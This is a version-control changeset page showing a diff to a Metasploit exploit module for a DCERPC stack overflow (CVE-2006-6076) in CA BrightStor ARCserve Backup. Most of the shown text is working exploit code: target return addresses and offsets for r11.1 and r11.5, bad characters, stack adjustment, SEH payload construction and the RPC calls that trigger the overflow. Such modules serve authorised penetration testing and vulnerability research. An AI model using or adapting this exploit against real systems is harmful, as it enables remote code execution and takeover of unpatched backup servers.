Navigation

← Previous Changeset
Next Changeset →

Changeset 5476

Timestamp:

04/16/08 08:08:11 (4 weeks ago)

Author:

patrickw

Message:

Updated targets, references.

Files:

framework3/trunk/modules/exploits/windows/brightstor/tape_engine.rb (modified) (6 diffs)

Legend:

: Unmodified
: Added
: Removed
: Modified
: Copied
: Moved

framework3/trunk/modules/exploits/windows/brightstor/tape_engine.rb

r4419	r5476
1	1	##
2		# $Id:$
	2	# $Id$
3	3	##
4	4
…	…
25	25	'Description' => %q{
26	26	This module exploits a stack overflow in Computer Associates BrightStor ARCserve Backup
27		~~11.5. By sending a specially crafted DCERPC request, an attacker could overflow the~~
28		buffer and execute arbitrary code.
	27	r11.1 - r11.5. By sending a specially crafted DCERPC request, an attacker could overflow
	28	the buffer and execute arbitrary code.
29	29	},
30		'Author' => [ 'MC' ],
	30	'Author' => [ 'MC', 'patrick' ],
31	31	'License' => MSF_LICENSE,
32	32	'Version' => '$Revision$',
…	…
35	35	[ 'CVE', '2006-6076' ],
36	36	[ 'BID', '21221' ],
	37	[ 'OSVDB', '30637' ],
	38	[ 'URL', 'http://www.milw0rm.com/exploits/3086' ],
	39	[ 'URL', 'http://www.ca.com/us/securityadvisor/newsinfo/collateral.aspx?cid=101317' ],
37	40	],
38	41	'Privileged' => true,
…	…
45	48	'Space' => 500,
46	49	'BadChars' => "\x00\x0a\x0d\x5c\x5f\x2f\x2e",
47		'StackAdjustment' => -3500,
	50	'StackAdjustment' => -9500,
48	51	},
49	52	'Platform' => 'win',
50	53	'Targets' =>
51	54	[
52		[ 'BrightStor ARCserve r11.5', { 'Ret' => 0x2380ceb5 } ],
53		],
	55	[ 'BrightStor ARCserve r11.1', { 'Ret' => 0x2380cdc7, 'Offset' => 1158 } ], #p/p/r cheyprod.dll 07/21/2004
	56	[ 'BrightStor ARCserve r11.5', { 'Ret' => 0x2380ceb5, 'Offset' => 1132 } ], #p/p/r cheyprod.dll ??/??/????
	57	],
54	58	'DisclosureDate' => 'Nov 21 2006',
55		'DefaultTarget' ~~=> 0~~))
	59	'DefaultTarget' => 1))
56	60
57		register_options([ Opt::RPORT(6502) ], self.class)
	61	register_options([ Opt::RPORT(6502) ], self.class)
58	62	end
59	63
60	64	def exploit
61	65	connect
62
	66
63	67	handle = dcerpc_handle('62b93df0-8b02-11ce-876c-00805f842837', '1.0', 'ncacn_ip_tcp', [datastore['RPORT']])
64	68	print_status("Binding to #{handle} ...")
…	…
71	75
72	76	dcerpc.call(43, request)
73
74		filler = "\x10\x09\xf9\x77" + rand_text_english(~~1132~~)
	77
	78	filler = "\x10\x09\xf9\x77" + rand_text_english(target['Offset'])
75	79	seh = generate_seh_payload(target.ret)
76	80	sploit = filler + seh
77	81
78	82	print_status("Trying target #{target.name}...")
79
	83
80	84	begin
81	85	dcerpc_call(38, sploit)
…	…
88	92
89	93	end
90		end
	94	end

Navigation

Changeset 5476

Legend:

framework3/trunk/modules/exploits/windows/brightstor/tape_engine.rb

Download in other formats: